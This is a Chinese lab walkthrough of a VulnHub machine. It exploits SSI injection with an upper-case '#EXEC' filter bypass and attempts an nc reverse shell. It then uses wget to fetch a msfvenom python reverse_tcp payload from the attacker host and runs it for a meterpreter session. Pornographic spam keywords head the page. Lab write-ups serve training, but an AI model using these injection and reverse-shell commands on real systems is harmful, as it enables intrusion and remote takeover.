日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

SSI注入实战

發布時間:2023/12/20 编程问答 37 豆豆
生活随笔 收集整理的這篇文章主要介紹了 SSI注入实战 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

文章目錄

  • 靶機環境
  • 一、服務器信息搜集
  • 二、網站信息搜集
    • 1.使用nikto掃描網站目錄
    • 2.瀏覽網站
  • 三、SSI注入漏洞利用
    • 1、SSI注入簡介:
    • 2、SSI注入測試網站
  • 四、利用nc反彈shell——失敗
  • 五、使用msf框架
    • 1、python木馬生成
    • 2、建立木馬監聽端
    • 3、上傳木馬文件到本地web服務器上
    • 4、構造SSI注入語句執行木馬


靶機環境

靶機下載網站:https://www.vulnhub.com/
使用Vmware虛擬機中NAT網絡
靶機 192.168.146.150
攻擊機 parrot 192.168.146.129


一、服務器信息搜集

-A 全面掃描(主動掃描)
-p-全端口掃描

nmap -p- -A 192.168.146.150


👆發現只有開放80端口,并且服務器用的是Ubuntu,中間件為Apache

二、網站信息搜集

1.使用nikto掃描網站目錄

nikto 是一款用來發現 web 應用程序漏洞的一個工具,常用于對web網頁服務器進行全面的多種掃描

nikto -h http://192.168.146.150

掃描出敏感文件/spukcab/,并且響應為200


↓訪問其url發現兩個備份文件

分別下載到Download里面

分別查看審計👇,但是并沒發現什么有價值的信息哦~
分別是網頁源代碼和配置信息

2.瀏覽網站

首先是一個登錄界面
開burpsuite抓包看一下
代碼如下(示例):

sudo burpsuite

并沒有發現什么可利用的地方


三、SSI注入漏洞利用

1、SSI注入簡介:

Server Side Injection,即服務器端注入。SSI 是類似于 CGI,用于html動態頁面的指令。
若網站目錄中發現了stm shtml shtm 的文件后綴名,并且網站對ssi的輸入沒有進行嚴格過濾
就有可能允許遠程在 Web 應用中注入腳本來執行代碼,造成SSI注入攻擊。

2、SSI注入測試網站

都輸入👇并且點擊submit提交

<!--#exec cmd="whoami" -->


關鍵敏感字符可能被過濾掉了

考慮大寫翻轉進行繞過再提交

<!--#EXEC cmd="whoami" -->


注入測試成功😄O(∩_∩)O

四、利用nc反彈shell——失敗

ps:本靶機利用nc正向和反向反彈shell經測試后都行不通
parrot建立監聽

nc -lvp 4444 <!--#EXEC cmd="nc -e /bin/bash 192.168.146.129 4444" -->


提交后parrot上沒有反應——失敗/(ㄒoㄒ)/~~

五、使用msf框架

1、python木馬生成

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.146.129 lport=4444 -f raw > shell.py


2、建立木馬監聽端

msfconsole use exploit/multi/handler set payload python/meterpreter/reverse_tcp set lhost 192.168.146.129 set lpoet 4444 exploit

3、上傳木馬文件到本地web服務器上

先把剛剛制作好的python木馬移動到var/www/html里

sudo mv /root/shell.py /var/www/html


**開啟apache服務**

service apache2 start

4、構造SSI注入語句執行木馬

<!--#EXEC cmd="wget http://192.168.146.129/shell.py"-->


給傳上去的木馬文件加權限👇

<!--#EXEC cmd="chmod 777 shell.py"-->


執行木馬

<!--#EXEC cmd="python shell.py"-->



成功上線😀,收工啦~~

總結

以上是生活随笔為你收集整理的SSI注入实战的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。